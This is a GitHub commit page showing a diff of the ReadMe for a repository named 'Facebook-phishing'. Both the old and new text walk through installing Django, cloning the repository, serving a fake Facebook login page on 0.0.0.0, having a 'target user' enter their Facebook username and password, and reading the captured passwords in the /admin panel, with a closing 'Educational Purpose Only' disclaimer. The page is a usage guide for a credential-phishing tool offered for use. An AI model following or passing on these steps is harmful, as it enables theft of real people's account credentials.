Skip to content

Commit

Permalink
Update ReadMe.md
Browse files Browse the repository at this point in the history
  • Loading branch information
IAmBlackHacker authored Sep 12, 2018
1 parent 789e050 commit 7c76540
Showing 1 changed file with 27 additions and 30 deletions.
57 changes: 27 additions & 30 deletions ReadMe.md
Original file line number Diff line number Diff line change
@@ -1,36 +1,33 @@
# Welcome To Phishing FaceBook
## Required Python2 or Python3

* 1.Download Link: https://www.python.org/ftp/python/3.6.1/python-3.6.1-amd64.exe (for Windows User)
https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi (for Windows User)
* 2.How To use
Download Links:
* https://www.python.org/ftp/python/3.6.1/python-3.6.1-amd64.exe (for Windows User)
* https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi (for Windows User)

# Installation
* Install Python from given links(Add Environment Vars if needed).
* Install Python Django [ command > "python -m pip install Django==1.8.9"]
* Install Python Requests [ command > "python -m pip install requests"]

# Download Repo
* git clone https://github.com/IAmBlackHacker/Facebook-phishing
* cd Facebook-phishing

# Make Backened
* python manage.py makemigrations
* python manage.py createsuperuser (this for creating admin username and password)

# Run Server
* python manage.py runserver 0.0.0.0:80

# Target User
* Open Link <Your IP> EX. 127.0.0.1:80
* Enter Facebook Username and Password

# Look for Password
* Open <Your IP>:<Port>/admin in browser Ex. 127.0.0.1:80/admin

```
install python first and make sure that it's added to path variable
```
```
download this repository and extract it
```
```
download django using this command "python -m pip install Django==1.8.9"
```
```
download requests using this command "python -m pip install requests"
```
```
you are now ready to do phishing just run startServer.bat for windows or startServer.sh for linux
of type cmd as given below
```
```
python manage.py runserver 0.0.0.0:8000
```
```
open link in browser like 127.0.0.1:8000 or ip:port
```
```
enter fb username password
```
```
see password on this linknow 127.0.0.1:8000/admin or ip:port/admin
Happy Hacking Day :) Educational Purpose Only ....
```
Enjoy

0 comments on commit 7c76540

Please sign in to comment.